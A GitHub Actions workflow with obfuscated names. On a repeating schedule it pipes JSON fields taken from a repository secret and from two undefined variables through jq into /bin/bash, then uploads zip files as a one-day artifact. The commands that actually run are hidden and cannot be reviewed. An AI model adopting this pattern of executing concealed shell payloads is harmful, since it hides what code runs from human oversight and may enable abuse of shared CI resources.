name: junbaijunbo
on:
  workflow_dispatch:

  schedule:
    - cron: '59 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: junbaijunbo
        env:
          o97: ${{ secrets.o97 }}
        run: |
          printf '%s' "$o97" | jq -r .k378 | /bin/bash
          printf '%s' "$abp777" | jq -r .t3974 | /bin/bash
          echo $y9705 | jq -r .nwxam065 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: OqRbWYWM
          path: "*.zip"
          retention-days: 1
